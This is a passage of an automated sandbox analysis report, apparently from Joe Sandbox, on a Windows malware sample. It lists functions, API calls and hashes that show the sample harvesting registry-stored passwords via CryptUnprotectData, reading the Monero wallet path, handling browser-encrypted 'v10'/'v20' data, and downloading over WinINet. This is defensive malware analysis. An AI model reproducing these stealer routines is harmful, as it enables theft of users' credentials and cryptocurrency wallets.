                                • lstrlen.KERNEL32(00000000), ref: 004DBC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DBC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DBC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DBCAC
                                • lstrlen.KERNEL32(00504AD4), ref: 004DBD23
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 4d1a684777aa472304918f34913b902a1d45055e80af027947390d281987df00
                                • Instruction ID: 93e17bbbab036a59f04c78a4e46bd8a0c28c40a220f4503f67048c797323aed8
                                • Opcode Fuzzy Hash: 4d1a684777aa472304918f34913b902a1d45055e80af027947390d281987df00
                                • Instruction Fuzzy Hash: 8CA18D70A10205CFCB21DF25D969AAEB7B1EF44308F19816FE8059B362DB39DC41CB98
                                Function 004F5EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004F5F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 004F5F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 004F6014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 004F609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 004F60D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: a16a867f0d78feb7dce0a1f8418c61dcf407ee5a90668071066e0f0603fd5255
                                • Instruction ID: c64f9a669eaaaf36f512fd4f4dabd44d864e26a7fd135f4017a42f1f2c117b9f
                                • Opcode Fuzzy Hash: a16a867f0d78feb7dce0a1f8418c61dcf407ee5a90668071066e0f0603fd5255
                                • Instruction Fuzzy Hash: 21619070700508DFDB18CF5CC99097EB7B6EF85304B354A5AE79287781CB35AD818BA9
                                Function 004EE049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 004EE07D
                                • lstrcat.KERNEL32(?,?), ref: 004EE098
                                • lstrcat.KERNEL32(?,?), ref: 004EE0AC
                                • lstrcat.KERNEL32(?,00CEA7C8), ref: 004EE0C0
                                • lstrcat.KERNEL32(?,?), ref: 004EE0D4
                                • lstrcat.KERNEL32(?,00CFE580), ref: 004EE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004EE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: f0735aae27a34d4ce20db0990ddb28cb2df02cbb94572d21ced9c1a4025bba98
                                • Instruction ID: 0ebfc895a496ee303e7724ba2ae83a2e426e351f8eeec1ef3781eb15360520a5
                                • Opcode Fuzzy Hash: f0735aae27a34d4ce20db0990ddb28cb2df02cbb94572d21ced9c1a4025bba98
                                • Instruction Fuzzy Hash: 24419F71A10128DBCB21EB65DD54ADE73B4BF58300F008AAAF64993351DF789F858B94
                                Function 004D7A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004D77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004D7805
                                  • Part of subcall function 004D77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 004D784A
                                  • Part of subcall function 004D77D0: StrStrA.SHLWAPI(?,Password), ref: 004D78B8
                                  • Part of subcall function 004D77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004D78EC
                                  • Part of subcall function 004D77D0: HeapFree.KERNEL32(00000000), ref: 004D78F3
                                • lstrcat.KERNEL32(00000000,00504AD4), ref: 004D7A90
                                • lstrcat.KERNEL32(00000000,?), ref: 004D7ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 004D7ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 004D7AF0
                                • wsprintfA.USER32 ref: 004D7B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D7B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D7B47
                                • lstrcat.KERNEL32(00000000,00504AD4), ref: 004D7B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: f7eadd3bca798fcbfc746be04278cdcb3934454414f4e2451160f2227216d149
                                • Instruction ID: 5b2405236e768c9b13419d07f2489aceb105df03c7ee3e5c6c4d4be40c162058
                                • Opcode Fuzzy Hash: f7eadd3bca798fcbfc746be04278cdcb3934454414f4e2451160f2227216d149
                                • Instruction Fuzzy Hash: 7131B672A04214EFCB10DB68DC549AFB779FB88704B14861BE64693350EF78E941CB69
                                Function 004E81B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 004E820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E8243
                                • lstrlen.KERNEL32(00000000), ref: 004E8260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E8297
                                • lstrlen.KERNEL32(00000000), ref: 004E82B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E82EB
                                • lstrlen.KERNEL32(00000000), ref: 004E8308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E8337
                                • lstrlen.KERNEL32(00000000), ref: 004E8351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E8380
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 35af2675fe6555894956e989cd2014caec37486b077753fa0b5c7a543492abef
                                • Instruction ID: c4248c751fa2a58232fb80be67524c3d682703935f8e6b63f08d28b9fdcbd0fb
                                • Opcode Fuzzy Hash: 35af2675fe6555894956e989cd2014caec37486b077753fa0b5c7a543492abef
                                • Instruction Fuzzy Hash: 59518D71A006129BDB10DF3AD968A6BB7A8EF44701F10855AED0ADB345DF38ED50CBE4
                                Function 004D77D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004D7805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 004D784A
                                • StrStrA.SHLWAPI(?,Password), ref: 004D78B8
                                  • Part of subcall function 004D7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 004D775E
                                  • Part of subcall function 004D7750: RtlAllocateHeap.NTDLL(00000000), ref: 004D7765
                                  • Part of subcall function 004D7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004D778D
                                  • Part of subcall function 004D7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004D77AD
                                  • Part of subcall function 004D7750: LocalFree.KERNEL32(?), ref: 004D77B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004D78EC
                                • HeapFree.KERNEL32(00000000), ref: 004D78F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 004D7A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: 1fe780a6df0bb59a3be61e61323ebeb5765b2ec6f42ccfccecc3ebb28e930de6
                                • Instruction ID: c67af6786e22a33e789445ddba886aaff1e94dcabdd66149eb3ec0d75185d858
                                • Opcode Fuzzy Hash: 1fe780a6df0bb59a3be61e61323ebeb5765b2ec6f42ccfccecc3ebb28e930de6
                                • Instruction Fuzzy Hash: AA7130B1D0021DEBDB10DF95DC90AEEBBB9EF45300F1045AAE609A7340EB355A85CF95
                                Function 004D1120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D1135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004D113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004D1159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004D1173
                                • RegCloseKey.ADVAPI32(?), ref: 004D117D
                                Strings
                                • SOFTWARE\monero-project\monero-core, xrefs: 004D114F
                                • wallet_path, xrefs: 004D116D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: 0527611a8352b628f13c18d3c1d8be36831e54b18d10eff272b06073009c8771
                                • Instruction ID: 54098e28197c9d00ca8201c178ad6b19f824ffb8b0fe7d57f76177d150144f7a
                                • Opcode Fuzzy Hash: 0527611a8352b628f13c18d3c1d8be36831e54b18d10eff272b06073009c8771
                                • Instruction Fuzzy Hash: 31F01D75640309FBD7109BA09C4DFAF7B6CEB04715F108255BF05E2291EAB45A4487A5
                                Function 004D9DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 004D9E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 004D9E42
                                • LocalAlloc.KERNEL32(00000040), ref: 004D9EA7
                                  • Part of subcall function 004F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004F71FE
                                • lstrcpy.KERNEL32(00000000,00504C48), ref: 004D9FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: a09436605d7807a14aaa5584ae8d1509452f83c0857af8d7281870688c1ac0de
                                • Instruction ID: 092af5f4c4863307e6f697e82423c61ded7a1aee8a7a6c40f4b29250cce34cd0
                                • Opcode Fuzzy Hash: a09436605d7807a14aaa5584ae8d1509452f83c0857af8d7281870688c1ac0de
                                • Instruction Fuzzy Hash: 8151DF71A002199BDB10EF65DC91B9E77A4EF50318F15406BFA09EB351CBB8ED008B98
                                Function 004D5640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004D565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004D5661
                                • InternetOpenA.WININET(004FCFEC,00000000,00000000,00000000,00000000), ref: 004D5677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 004D5692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004D56BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 004D56E1
                                • InternetCloseHandle.WININET(?), ref: 004D56FA
                                • InternetCloseHandle.WININET(00000000), ref: 004D5701
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: 2de6188a7cce792df95487c807adc0095613e5cdfb0ba5df38dffab3115b2e6a
                                • Instruction ID: 0541994642dc728c7e780659202754fe1f12959ea5130d1f11b2b0e20591b0bd
                                • Opcode Fuzzy Hash: 2de6188a7cce792df95487c807adc0095613e5cdfb0ba5df38dffab3115b2e6a
                                • Instruction Fuzzy Hash: 8841A170A00205DFDB14CF54DD94BAAB7B4FF44300F24C16BE6189B3A1EB799841CB98
